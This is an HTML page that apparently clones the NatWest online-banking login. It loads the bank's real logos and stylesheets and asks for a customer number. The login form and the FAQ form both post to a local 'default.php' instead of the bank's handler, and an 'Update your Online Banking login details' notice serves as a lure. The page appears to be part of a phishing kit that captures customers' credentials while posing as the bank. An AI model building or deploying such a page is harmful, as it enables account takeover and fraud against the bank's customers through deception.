 
 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
	Log in to online banking
</title><meta http-equiv="content-type" content="text/html;charset=utf-8" /><meta http-equiv="Content-Style-Type" 

content="text/css"<link href="https://www.nwolb.com/Brands/master.css" rel="stylesheet" type="text/css" media="all" /><link 

href="https://www.nwolb.com/Brands/jq_styles/datePicker.css" rel="stylesheet" type="text/css" media="all" /><link 

href="https://www.nwolb.com/Brands/NWB/css/npc.css" rel="stylesheet" type="text/css" media="all" /><!--[if IE 7]><link 

href="https://www.nwolb.com/Brands/NWB/css/ie7.css" rel="stylesheet" type="text/css" media="all" />
<![endif]--><link 

href="https://www.nwolb.com/Brands/NWB/css/NPC_auralstyle.css" rel="stylesheet" type="text/css" media="aural" /><link 

href="https://www.nwolb.com/Brands/master_print.css" rel="stylesheet" type="text/css" media="print" /></head>
<body id="ctl00_bodyTag" class="wizard">
	
	
	<div id="wrapper" class="default_bg">
		<div id="acceskeys">
			<div id="skiplinks">
				<div class="ddalink">
	<a id="ctl00_skipLinks_ctl00_beginLink" accesskey="0" title="Return to start of screen / Access key details" 

class="ddalink" href="https://www.nwolb.com/login.aspx#">Return to start of 
	screen / Access key details</a><a 

id="ctl00_skipLinks_ctl00_MenuLink" accesskey="m" title="Skip to Menu" class="ddalink" 

href="https://www.nwolb.com/login.aspx#menu">Skip to Menu</a><a id="ctl00_skipLinks_ctl00_ContentLink" accesskey="s" 

title="Skip to main content" class="ddalink" href="https://www.nwolb.com/login.aspx#content">Skip 
	to main content</a>
</div>
			</div>
		</div>
		<div id="canvas" class="twoLines">
			
<div id="header">
    <div style="position:absolute;top:8px;left:7px;">
        <a href="http://www.natwest.com" target="_top"><img id="ctl00_header_ctl00_BrandImage4" 

src="https://www.nwolb.com/brands/NWB/images/logo.gif" alt="Logo: NatWest" style="height:45px;width:168px;border-

width:0px;" /></a><img id="ctl00_header_ctl00_BrandImage5" src="https://www.nwolb.com/brands/NWB/images/strapline_hb.gif" 

alt="Helpful Banking" style="height:45px;width:175px;border-width:0px;margin-top:5px;" />
    </div> 
    <ul id="quickLinks">
        <li><a id="ctl00_header_ctl00_PopUpLink2Anchor" title="Accessibility : Opens in a new window" onclick="window.open

('http://www.natwest.com/tools/general/nwolb_legals/accessibility.htm','headerWindow','top=70,left=60,width=800,height=600,

resizable=yes,scrollbars=yes,location=yes');return false;" 

href="http://www.natwest.com/tools/general/nwolb_legals/accessibility.htm" target="headerWindow">
		Accessibility</a></li>
        <li class="last"><a id="ctl00_header_ctl00_Helplink2Anchor" title="Help : Opens in a new window" class="helpLink" 

href="https://www.questions.natwest.com/RBSG/index?

page=search&amp;pageID=LI5&amp;brand=NPC&amp;wc=FAA5D06E7670459E5F35FCA8A031B99563BFE5B3" target="helpwindow">
		Help</a></li>
    </ul> 
       
</div>
 
			<div id="content">
				<a name="content"></a>
				<div id="mid">
					<div id="ctl00_snailTrail__43594998ddcf_SnailTrail">
 
</div>
					<form name="aspnetForm" method="post" action="default.php" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="NextButton_button" />
<input type="hidden" name="submind" id="submind" value="0" />
<input type="hidden" name="LI5CBA_Visibility" id="LI5CBA_Visibility" value="False" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE2" id="__VIEWSTATE2" value="4wkAAC6fwT+Iq2V+msZeg0R1vKE7CrdVqStO90/g

+x93FQtSuxxpHF3USI92kqwns4qUpmCwUmiywH4i7K465LuA7rI/gjPICpHIqZhUGXy8NhdVyxkLTLp8rGnIASafPOxrvOZVbakZ

+bmjNpyABO2MhcIE2wiwmQyl15VxxEHnz

+vufv4/BCR8GnNglItdZLgUXv2Lfe28t36G/SFsThKxwcLQ0bX0CkOKRgqQgnjttw2xpa5pRIU16SRMskGMgfQpvvIoJnTeUlesPhwPCZaDFWcPFPbhJaxPNb8p

mq2GmSmsgch8+fTaUVGBm+NexaaYNQF8djWfLfNT8d8M/rNcOeYLi+P0gfKIqy9DJ

+I7kHdr5SU7D2l1Z2TeeASwYZczaTjUuxNdeKX7xKgSGH428UL/tS9oZhb8bdO6pYXcaAdy2dWMMZ8W7ZEghA3vYv

+fhoM7H7aP4WK8ws6QHsZlimWlQxZCyxP/uSjS5QY5J2ijWVLaoyYtEY9pkHIQowikd2OkdJz+8EpBc03W/mo63s00s7XnTcjZ

+Ta/acPmkmZXjDwFFlOlltSr8krOWiAcZkLFkJx1p6I/5aKStURJSdB7vuyMtlEyYAIW2hXSmINu5WYJsebxkz3njtnfLotTbTel/LTtaWO6gywvAjB4w7hbJLg

2d3Cqe+33gWkeVgzZFhtAsI0v+TeTbdHszQqb8X0iNyRj/VO7nlrEFH8/bIY18zdfzATRqVKTXS+98uXQH9Pqu9HZFRrGab8nLYh2JRYh

+4qnjqIiaB9mc5Ue3049xV5gw9lI5SCH+aFFDeGUWLhtZFJdm/ltQ7SGB19bW8Nx8Aku5x5fdmyu4WghIXengZyYOXS/XeV1hH

+SBzrn7ZO9SnkQSIC2yj8mLS6PXBr8qQzKnwz1l21BAcR1O7TCxLXSr5s0kY8ULn8voWZmhHX13tXxK0NoY87KZDwWmXOnaoVItalrjXStOopZn86My2kTcPVZl

6fpIndN5oGaDBPhi1WwCn1AoSe6aT5TD4W0cfmxsVZvHquA2Hl/1AKRYgM5Xa3cTvbdYlGIRWQt6My1L1t+l2UXTqD2wOR1r

+Fs2kAIHfUJUFViQvmOwrF4QhliWLSv2Lp2msgM9lE66kMRuMa4X8QX21cBwKK1H5jazuSp/kW4R4eCqV857NoxfueLCVXPAKypV4tU

+ILQNTBYPz8FCe0IJeFsbUAJkZOEAraM86alUTsZULtfaZUlNHEnzIYwlG

+OGxGE5HzGmVxhLD30ruo50AVgqAIm1nP0dUH6jsl/Ws9EVRlPMgS6vkvq8XdJU1K1lNbGBPkUG

+iehCPUNyhEaajB9xlZcko6hEjTEwcZk9YbXFhiBd5QIB/dF5ljQgT/G7mnb80D8EIGYE1NaL

+RvclB4HnGN5BlYgCD4AnXyYxLa75FUD16sOyhAGkmh9oCttEqS5FSnTRTQ3S6U7uXEtNUArKXKLw1ACz8Eiv4l35UWaC4g4dpFqF3Gy9i726HEwK8D5o8rMER9

E9qIIZPToSFo74PljIhUuhTpLoFt

+1thK7LjFAqayP9jILNnqDif6N23vWZ1m0klZHpo9DG7sYH93RAqOq2iZ1H0MKOf/C3Zshya6qsntyKM8aIaDpjpyHmlKSV2sqX1p4btfo0MMSNwvFAxxQhrHOv

pPF+Y3Z1npT460vqNOgk3sKLJPNxRsM+KGIugtUGSj1ZElg5MBm6ccdtbKp1ViMrJBCRQ1Lw6icVP

+d2N6vPq2KZ0u7259xb6clOlAy648eDPhNvCgfxZpKFLaGZyJbA3ZZkMTMR2SXEad/8kHG4I/qlJlNJUJu6b9FThFKfe4qyoYwc31gmg6VySRadRaKMOjXTBi6I

byXS3rL1Bf/w

+iXbQZ8CKcB3mS7auuldD2ielDi7SHiBjzxpO7eIJGG1zy/GxKpH9bvbnOlmy8jUS5zk2OytBSCxzSAH82KIbFGTTdTDcLSvIlofEAfzJEHUtCdZP6a2gdpehko

F4KE5O00TVvArdPwL6+0gAnlqWiFis8bmhlZjbRkINb2c5hyDPplMm52lcNbHo7bFSASfAOfjAucxG/mkkkRpoBoZ/8RwTM3a7RkXjDPEXV

+F6+nHZTRYbia/N1ONpPJRJ/qTvwm5/ngPPeWbkFQpI0Zgpz65YLtCA8mWeORx8QWHWfR0ZqFC/aAWsdm0lsBUpG5gm15Y3O5QDOdGgMi93NidZQ3Cp/gMCVllb

fc9+kAzym3xwdl1eE6RcDqfmYyvRh60QmfX0yOL6e6XJE4exuQKXd0e88VRSolFo265tlqbxjRVP6OBpzykvxZuzlPELVlJvmS5uGOyALzHd2TJvTqqr77+R/7d

IRuCNR8LYxYsFUiWYxlICa/OinQXXZaVvrGxLquctO0CJw1hrAcZPN2OCELkKYf2bGKNS89sQYW6pseQCtmuUTABBZLLEkgDvlAGJ6nsiNJzbJQYEFhuZDIGBtc

CnfXaKdrJt3Nn9dMJw9vP920SgKkKfSfphfwQV+Z8nGnYTbL5HTE29/qDNKXK/QETWsTEz+zYKorT02+Ym9TXbn1phZx4qwGw5dA*" />
<input type="hidden" name="__VIEWSTATE" id="
__VIEWSTATE" value="" />
</div>
 
<script type="text/javascript"> 
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
    theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
    if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
        theForm.__EVENTTARGET.value = eventTarget;
        theForm.__EVENTARGUMENT.value = eventArgument;
        theForm.submit();
    }
}
//]]>
</script>
 
 
<script src="/WebResource.axd?d=c4377h_Wk5bzPmrqw6CkGA2&amp;t=633628965262104085" type="text/javascript"></script>
 
 
<script type="text/javascript"> 
//<![CDATA[
 
document.onkeypress = nextButtonAutoClick;
 
function nextButtonAutoClick(e)
{
	var code;
	// If e is undefined then the browser must be I.E (which doesn't pass event information this way)
	// so get the details of the key pressed from the window object instead
	if (!e) e = window.event;
 
	// Depending on the browser the actual value of the key pressed will be held in either the keyCode or which 

properties
	if (e.keyCode)
	{
		code = e.keyCode;
	}
	else
	{
		if (e.which)
		{
			code = e.which;
		}
	}
 
	// If the code value is 13 then the user pressed Return - so trigger the client side validation (if it exists)
	if (code == 13)
	{
		pressedButton=this;
		if (typeof(Page_ClientValidate) == 'function')
		{
			Page_ClientValidate();
		}
	}
}
				//]]>
</script>
 
<script src="/WebResource.axd?d=Nsqetkexl4ddD1qd9UbBq7mQAErlmPod78yy-RI6rwY1&amp;t=633628965262104085" 

type="text/javascript"></script>
<script src="https://www.nwolb.com/Brands/jquery-1.3.2.min.js" type="text/javascript"></script>
<script type="text/javascript"> 
//<![CDATA[
 
					var faqPageId = "LI5";
					var faqWc = "FAA5D06E7670459E5F35FCA8A031B99563BFE5B3";
					var faqSegmentCode = "";
					var faqAgeCategory = "";
					//]]>
</script>
 
<script src="https://www.nwolb.com/Brands/faqjs.aspx" type="text/javascript"></script>
<script type="text/javascript"> 
//<![CDATA[
function WebForm_OnSubmit() {
if (typeof(ValidatorOnSubmit) == "function" && ValidatorOnSubmit() == false) return false;
return true;
}
//]]>
</script>
 
					
    
    <div id="ctl00_mainContent_ValidationSummary" class="error" style="color:;display:none;">
 
</div><span id="ctl00_mainContent_ctl00" class="errorIndicator" style="color:Red;display:none;"></span>
        <div id="ctl00_mainContent_LI5PNL">
					<div id="ctl00_mainContent_LI5PFA" class="li5Header">
	
					    <h1>
		<img id="LI5BTHA" alt="Online banking services" class="H1Img " 

src="https://www.nwolb.com/brands/NWB/images/generated_9066AC7D6ED031D00218897A9B7340288CEA4593-1.gif" />
	</h1>
					    
					    
					</div>
					<div id="ctl00_mainContent_LI5PFB" class="tabcontainer">
		
					    <ul id="ctl00_mainContent_LI5TLA" class="tabUI">
			
					        <li id="ctl00_mainContent_LI5TABA" class="active"><span class="left"><img 

id="ctl00_mainContent_LI5TABA_LI5TABA" title="Online banking" 

src="https://www.nwolb.com/Brands/NWB/images/npc_logon_tab.gif" alt="" style="border-width:0px;" /></span></li>
					    <li id="ctl00_mainContent_LI5TABB"><span><a 

id="ctl00_mainContent_LI5TABB_Anchor" title="Switch to NatWest Credit Card Online Services log in page." 

href="https://www.natwest.com/cardservices/cctab" target="_top"><img title="Switch to NatWest Credit Card Online Services 

log in page." src="https://www.nwolb.com/Brands/NWB/images/cc_logon_tab.gif" alt="&lt;span>&lt;/span>" style="border-

width:0px;" /></a></span></li>
					
		</ul>
			                    <div id="LI5PFC" class="box_li5border"><div class="box_top_li5border"><hr 

/></div>
					                <div id="ctl00_mainContent_LI5TABA_PageFrame1" 

class="innerspacing1">
			
					                    <div id="PageFrame2" class="box_li5inntertab"><div 

class="box_top_li5inntertab"><hr /></div>
					                        <div id="ctl00_mainContent_LI5TABA_PageFrame3" 

class="innerspacing2">
				
					                            <h2 id="LI5BTHB" class="">
					Log in to online banking
				</h2>
					                            
					                            <ul class="form"><li class="first"><span 

id="ctl00_mainContent_LI5TABA_DBID_dbidvalidator" class="errorIndicator" style="color:Red;display:none;"><img title="Your 

Customer Number is made up of your date of birth (ddmmyy) and up to 4 other numbers as advised when you joined the 

service." class="ErrorMarker" src="https://www.nwolb.com/Brands/NWB/images/error.gif" alt="" style="border-width:0px;" 

/></span><span id="ctl00_mainContent_LI5TABA_DBID_RegularExpressionValidator" style="color:Red;display:none;"><img 

title="Your Customer Number is made up of your date of birth (ddmmyy) and up to 4 other numbers as advised when you joined 

the service." class="ErrorMarker" src="https://www.nwolb.com/Brands/NWB/images/error.gif" alt="" style="border-width:0px;" 

/></span><span id="ctl00_mainContent_LI5TABA_DBID_RequiredValidator" class="errorIndicator" 

style="color:Red;display:none;"><img title="Some of the information required has not been entered." class="ErrorMarker" 

src="https://www.nwolb.com/Brands/NWB/images/error.gif" alt="" style="border-width:0px;" /></span><label 

for="ctl00_mainContent_LI5TABA_DBID_edit" id="ctl00_mainContent_LI5TABA_ControlPair1Label" class="wizCrl">Customer 
													number</label><span><span id="ctl00_mainContent_LI5TABA_DBID" title="Enter your customer number to service your bank 

accounts and view credit cards online"><input name="DBID_edit" type="text" maxlength="10" 

id="ctl00_mainContent_LI5TABA_DBID_edit" autocomplete="off" size="20" /></span></span></li></ul>
							                        
						                        
					                            
						                        <p>
						                            <span 

id="ctl00_mainContent_LI5TABA_LI5BTEA">This is your date of birth (ddmmyy) 
													followed by your unique 
													number which identifies you 
													to the bank.</span>
						                        </p>
						                        
					                            
					                            <div class="checkbox">
					
					                                <input id="ctl00_mainContent_LI5TABA_LI5CBA" 

type="checkbox" name="ctl00$mainContent$LI5TABA$LI5CBA" /><label for="ctl00_mainContent_LI5TABA_LI5CBA">If 
													you have an Activation Code 
													and you are using the 
													service for the first time 
													or re-registering, please 
													select this box.</label>
						                        </div>    
						                        
					                            
					                            <div class="left">
						
					                                <p>
					                                    <a id="ctl00_mainContent_LI5TABA_LI5NLBAnchor" 

title="Forgotten any of your log in details? : Opens in a new window" onclick="window.open

('https://www.nwolb.com/help.aspx?

id=CN1','PinPassHelpWindow','height=600,width=800,status=yes,toolbar=no,menubar=no,location=no,scrollbars=yes,resizable=yes

');return false;" href="https://www.nwolb.com/help.aspx?id=CN1" target="PinPassHelpWindow">
														Forgotten any of your 
														log in details?</a>
					                                </p>
					                                
					                                
					                            </div>
					                            <div class="li5_lba">
							
					                                <div class="btnbg" 

id="ctl00_mainContent_LI5TABA_LI5-LBA_button_wrapper">
								<div class="btnt">
									<div class="btnr">
										<div class="btnb">
											<div class="btnl">
												<div class="btntl">
													<div class="btntr">
														<div 

class="btnbr">
															

<div class="btnbl">
																

<input type="submit" name="ctl00$mainContent$LI5TABA$LI5-LBA_button_button" value="Log in" 

onclick="pressedButton=this;WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions(&quot;ctl00$mainContent$LI5TABA$LI5-

LBA_button_button&quot;, &quot;&quot;, true, &quot;&quot;, &quot;&quot;, false, false))" id="ctl00_mainContent_LI5TABA_LI5

-LBA_button_button" class="button-right" />
															

</div>
														</div>
													</div>
												</div>
											</div>
										</div>
									</div>
								</div>
							</div>
					                            </div>
					                            <div class="clear">
								
					                            </div>
					                        </div>
					                    </div>
					                </div>
					               </div>
					           <div id="LI5PFF" class="box_li5register"><div 

class="box_top_li5register"><hr /></div>
					                <div id="ctl00_mainContent_LI5TABA_PageFrame4" 

class="innerspacing3">
									
	                                    
			                            
			                            <p>
			                                <a id="ctl00_mainContent_LI5TABA_LI5NLEAnchor" target="_top" 

href="http://www.natwest.com/online">Find out more and register for online 
											banking</a>
				                        </p>
				                    </div>
					            </div>
					    
			</div>
					<div id="LI5PFG" class="box_furtherOptionsClear"><div 

class="box_top_furtherOptionsClear"><hr /></div>	
					<div id="ctl00_mainContent_PageFrame5" class="innerspacing4">
											                
					    &nbsp;<h2 id="LI5BTHH" class="">
											Your security is important
										</h2>
						<span id="ctl00_mainContent_LI5BTEB0">Update your Online 
						Banking login details .</span><span id="ctl00_mainContent_LI5BTEC"><br></span>
						
					</div>	 	
					</div>
					<div id="ctl00_mainContent_LI5PFH" class="legal_text">
											<p><span 

id="ctl00_mainContent_LI5BTEB">Only individuals who have a NatWest account and 
											authorised access to online banking 
											should proceed beyond this point. 
											For the security of customers, any 
											unauthorised attempt to access 
											customer bank information will be 
											monitored and may be subject to 
											legal action.</span></p></div>
        </div>
        
        
        
        
        
        
        
				
				 
			<span id="ctl00_mainContent_ctl144" class="errorIndicator" style="color:Red;display:none;"></span>
 
    <script type="text/javascript">
    //<![CDATA[
				document.write("<input type=\"hidden\" name=\"scriptingon\" value=\"true\" />");
	//]]>
    </script>
 
 
					
<script type="text/javascript"> 
//<![CDATA[
var Page_ValidationSummaries =  new Array(document.getElementById("ctl00_mainContent_ValidationSummary"));
											var Page_Validators =  new Array

(document.getElementById("ctl00_mainContent_ctl00"), document.getElementById

("ctl00_mainContent_LI5TABA_DBID_dbidvalidator"), document.getElementById

("ctl00_mainContent_LI5TABA_DBID_RegularExpressionValidator"), document.getElementById

("ctl00_mainContent_LI5TABA_DBID_RequiredValidator"), document.getElementById("ctl00_mainContent_ctl144"));
											//]]>
</script>
 
<script type="text/javascript"> 
//<![CDATA[
var ctl00_mainContent_ValidationSummary = document.all ? document.all["ctl00_mainContent_ValidationSummary"] : 

document.getElementById("ctl00_mainContent_ValidationSummary");
											

ctl00_mainContent_ValidationSummary.headertext = "Customer advice, please address the following issues:";
											

ctl00_mainContent_ValidationSummary.showmessagebox = "True";
											var ctl00_mainContent_ctl00 = 

document.all ? document.all["ctl00_mainContent_ctl00"] : document.getElementById("ctl00_mainContent_ctl00");
											ctl00_mainContent_ctl00.display = 

"None";
											

ctl00_mainContent_ctl00.evaluationfunction = "CustomValidatorEvaluateIsValid";
											var 

ctl00_mainContent_LI5TABA_DBID_dbidvalidator = document.all ? document.all["ctl00_mainContent_LI5TABA_DBID_dbidvalidator"] 

: document.getElementById("ctl00_mainContent_LI5TABA_DBID_dbidvalidator");
											

ctl00_mainContent_LI5TABA_DBID_dbidvalidator.controltovalidate = "ctl00_mainContent_LI5TABA_DBID";
											

ctl00_mainContent_LI5TABA_DBID_dbidvalidator.errormessage = "Your Customer Number is made up of your date of birth (ddmmyy) 

and up to 4 other numbers as advised when you joined the service.";
											

ctl00_mainContent_LI5TABA_DBID_dbidvalidator.display = "Dynamic";
											

ctl00_mainContent_LI5TABA_DBID_dbidvalidator.evaluationfunction = "CustomValidatorEvaluateIsValid";
											var 

ctl00_mainContent_LI5TABA_DBID_RegularExpressionValidator = document.all ? document.all

["ctl00_mainContent_LI5TABA_DBID_RegularExpressionValidator"] : document.getElementById

("ctl00_mainContent_LI5TABA_DBID_RegularExpressionValidator");
											

ctl00_mainContent_LI5TABA_DBID_RegularExpressionValidator.controltovalidate = "ctl00_mainContent_LI5TABA_DBID_edit";
											

ctl00_mainContent_LI5TABA_DBID_RegularExpressionValidator.errormessage = "Your Customer Number is made up of your date of 

birth (ddmmyy) and up to 4 other numbers as advised when you joined the service.";
											

ctl00_mainContent_LI5TABA_DBID_RegularExpressionValidator.display = "Dynamic";
											

ctl00_mainContent_LI5TABA_DBID_RegularExpressionValidator.evaluationfunction = "RegularExpressionValidatorEvaluateIsValid";
											

ctl00_mainContent_LI5TABA_DBID_RegularExpressionValidator.validationexpression = "[0-9]{7,10}";
											var 

ctl00_mainContent_LI5TABA_DBID_RequiredValidator = document.all ? document.all

["ctl00_mainContent_LI5TABA_DBID_RequiredValidator"] : document.getElementById

("ctl00_mainContent_LI5TABA_DBID_RequiredValidator");
											

ctl00_mainContent_LI5TABA_DBID_RequiredValidator.controltovalidate = "ctl00_mainContent_LI5TABA_DBID_edit";
											

ctl00_mainContent_LI5TABA_DBID_RequiredValidator.errormessage = "Some of the information required has not been entered.";
											

ctl00_mainContent_LI5TABA_DBID_RequiredValidator.display = "Dynamic";
											

ctl00_mainContent_LI5TABA_DBID_RequiredValidator.evaluationfunction = "RequiredFieldValidatorEvaluateIsValid";
											

ctl00_mainContent_LI5TABA_DBID_RequiredValidator.initialvalue = "";
											var ctl00_mainContent_ctl144 = 

document.all ? document.all["ctl00_mainContent_ctl144"] : document.getElementById("ctl00_mainContent_ctl144");
											

ctl00_mainContent_ctl144.errormessage = "<p> The Customer Number, PIN or Password has been entered incorrectly.</p><p> 

Please re-enter carefully to avoid temporarily losing access to online banking and Telephone Banking. </p>";
											ctl00_mainContent_ctl144.display = 

"None";
											

ctl00_mainContent_ctl144.evaluationfunction = "CustomValidatorEvaluateIsValid";
											//]]>
</script>
 
											
<script type="text/javascript"> 
//<![CDATA[
top.document.title='Log in to online banking';//]]>
</script>
 
<script type="text/javascript"> 
<!--
var Page_ValidationActive = false;
if (typeof(ValidatorOnLoad) == "function") {
    ValidatorOnLoad();
}
 
function ValidatorOnSubmit() {
    if (Page_ValidationActive) {
        return ValidatorCommonOnSubmit();
    }
    else {
        return true;
    }
}
// -->
</script>
        
<script type="text/javascript"> 
//<![CDATA[
document.getElementById('ctl00_mainContent_LI5TABA_DBID_edit').focus()//]]>
</script>
</form>
				</div>
				<a name="menu"></a>
				<div id="ctl00_leftPanel" class="left menu">
					
					<div id="faqPanel" class="box_faqPanel"><div class="box_top_faqPanel"><hr /></div>
	<div class="box_faqPanelWrapper"><div class="box_top_faqPanelWrapper"><hr /></div>
		<div id="ctl00_faqs_ctl00_questionPanel" class="questionPanel">
												
			<div class="faqHeading">
													
				<h3>
														<img 

id="FAQBTHA" alt="Help 24x7" class="H3Img " 

src="https://www.nwolb.com/brands/NWB/images/generated_FF75EF355BDAE1559C9C80DB0CAE8194C7F233DD-3.gif" />
													</h3>
			</div>
			<p>
				<span id="ctl00_faqs_ctl00_FAQBTEA">Got a question? <br /> We 
				can help</span>
			</p>
		<form class="faqForm" method="get" action="default.php" 

target="_blank">
														<input 

id="ctl00_faqs_ctl00_ctl04" name="brand" value="NPC" type="hidden" /><input id="ctl00_faqs_ctl00_ctl05" name="pageID" 

value="LI5" type="hidden" /><input id="ctl00_faqs_ctl00_ctl06" name="wc" value="FAA5D06E7670459E5F35FCA8A031B99563BFE5B3" 

type="hidden" /><input id="ctl00_faqs_ctl00_ctl07" name="segmentCode" value="" type="hidden" /><input 

id="ctl00_faqs_ctl00_ctl08" name="ageCategory" value="" type="hidden" /><input id="ctl00_faqs_ctl00_ctl09" name="page" 

value="search" type="hidden" /><input id="ctl00_faqs_ctl00_FAQ-IF1" class="faqQuestion" name="question" value="Why can't I 

log in?" type="text" maxlength="250" /><label for="ctl00_faqs_ctl00_FAQ-IF1" class="hidden">Question</label><div 

class="faqNav">
					<div class="btnNext btnbg">
						<div class="btnt">
							<div class="btnr">
								<div class="btnb">
									<div class="btnl">
										<div class="btntl">
											<div class="btntr">
												<div class="btnbr">
													<div 

class="btnbl"><input id="ctl00_faqs_ctl00_FAQ-BTN1" class="button-right" name="" value="Ask" type="submit" /></div>
													</div>
												</div>
											</div>
										</div>
									</div>
								</div>
							</div>
						</div>
					</div>
													</form></div>
	</div>
	<div id="ctl00_faqs_ctl00_topFAQsPanel" class="topFaqPanel">
														
	</div>
	<br clear="all" />
</div>
 
					
					
				</div>
			</div>
			
			<br class="clear" />
		</div>
		
<div id="footerContainer">
    <div id="footer">
        <ol class="footer_navbar">
            <li><a id="ctl00_footer_ctl00_PopUpLink2Anchor" title="Legal Info : Opens in a new window" 

onclick="window.open

('http://www.natwest.com/tools/general/nwolb_legals/index.htm','headerWindow','top=70,left=60,width=800,height=600,resizabl

e=yes,scrollbars=yes,location=yes');return false;" href="http://www.natwest.com/tools/general/nwolb_legals/index.htm" 

target="headerWindow">Legal Info</a></li>
    		<li><a id="ctl00_footer_ctl00_PopUpLink3Anchor" title="Privacy  : Opens in a new window" 

onclick="window.open

('http://www.natwest.com/tools/general/nwolb_legals/privacy.htm','headerWindow','top=70,left=60,width=800,height=600,resiza

ble=yes,scrollbars=yes,location=yes');return false;" href="http://www.natwest.com/tools/general/nwolb_legals/privacy.htm" 

target="headerWindow">Privacy </a></li>
    		<li><a id="ctl00_footer_ctl00_PopUpLink4Anchor" title="Security : Opens in a new window" 

onclick="window.open

('http://www.natwest.com/tools/general/nwolb_legals/security.htm','headerWindow','top=70,left=60,width=800,height=600,resiz

able=yes,scrollbars=yes,location=yes');return false;" href="http://www.natwest.com/tools/general/nwolb_legals/security.htm" 

target="headerWindow">Security</a></li>
    		<li class="last"><span id="ctl00_footer_ctl00_CopyrightText">� 
			2005-2009 National Westminster Bank plc</span></li>
        </ol>
    </div>
</div>
 
 
		
<!-- Omniture Logging -->
<script type="text/javascript"> 
//<![CDATA[
    window.tc = window.tc || {};
    tc.log_path = "https://www.nwolb.com/templates/script/touchclarity";
    tc.site_id = 461;
    tc.server_hostname = "Touchclarity.natwest.com";
//]]>
</script>
<script type="text/javascript" src="https://www.nwolb.com/templates/script/touchclarity/tc_targeting.js"></script>
<!-- End of Omniture content tag -->
                            
	</div>
</body>
</html>